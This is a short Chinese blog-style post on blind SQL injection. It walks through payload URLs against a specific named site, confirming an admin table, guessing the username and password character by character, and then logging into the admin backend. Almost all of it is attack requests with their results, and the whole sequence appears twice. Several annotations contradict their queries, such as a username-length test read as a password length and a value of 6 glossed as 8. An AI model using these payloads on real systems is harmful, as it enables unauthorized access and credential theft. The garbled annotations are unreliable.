sql 注入方式
2016-10-11 19:16
176 查看
1.寻找目标
目标网站:http://www.chencheng.com/index.php?id=407
2.测试目标
http://www.chencheng.com/index.php?id=407 and 1=1 返回正常
http://www.chencheng.com/index.php?id=407 and 1=2 返回异常
http://www.chencheng.com/index.php?id=407 and 1=(select min(id) from admin)and 1=(select min(id) from admin) 返回正常 说明存在
http://www.chencheng.com/index.php?id=407 and 1=(select min(id) from admin where len(username)>4) 返回正常,确定密码大于4位
http://www.chencheng.com/index.php?id=407 and 1=(select min(id) from admin where len(username)<8) 返回正常,确定密码小于8位
http://www.chencheng.com/index.php?id=407 and 1=(select min(id) from admin where len(username)=6) 返回正常,确定密码等于8位
http://www.chencheng.com/index.php?id=407 and 1=(select min(id) from admin where left(username,1)='1') 返回正常,确定管理员编号为第一位
http://www.chencheng.com/index.php?id=407 and 1=(select min(id) from admin where left(password,1)='3') 返回正常,猜测密码
http://www.chencheng.com/index.php?id=407 and 1=(select min(id) from admin where left(password,6)='335500') 返回正常,猜测密码
根据猜测帐号,密码,然后选择登陆窗口登陆后台!呵呵
目标网站:http://www.chencheng.com/index.php?id=407
2.测试目标
http://www.chencheng.com/index.php?id=407 and 1=1 返回正常
http://www.chencheng.com/index.php?id=407 and 1=2 返回异常
http://www.chencheng.com/index.php?id=407 and 1=(select min(id) from admin)and 1=(select min(id) from admin) 返回正常 说明存在
http://www.chencheng.com/index.php?id=407 and 1=(select min(id) from admin where len(username)>4) 返回正常,确定密码大于4位
http://www.chencheng.com/index.php?id=407 and 1=(select min(id) from admin where len(username)<8) 返回正常,确定密码小于8位
http://www.chencheng.com/index.php?id=407 and 1=(select min(id) from admin where len(username)=6) 返回正常,确定密码等于8位
http://www.chencheng.com/index.php?id=407 and 1=(select min(id) from admin where left(username,1)='1') 返回正常,确定管理员编号为第一位
http://www.chencheng.com/index.php?id=407 and 1=(select min(id) from admin where left(password,1)='3') 返回正常,猜测密码
http://www.chencheng.com/index.php?id=407 and 1=(select min(id) from admin where left(password,6)='335500') 返回正常,猜测密码
根据猜测帐号,密码,然后选择登陆窗口登陆后台!呵呵